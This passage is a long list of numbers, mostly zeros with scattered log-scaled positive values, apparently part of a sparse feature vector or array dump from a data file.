0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.9444389791664403, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, \n 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 5.723585101952381, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 3.178053830347946, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 1.9459101490553132, 0, 0.0, 11.29853313840085,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 6.200409765562088, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 8.873266907405862, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.1972245773362196, \n 6.351472826488934, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 4.828313737302301, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.5553480614894135, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.46286043483228, 3.6375861597263857, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.367295829986474,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 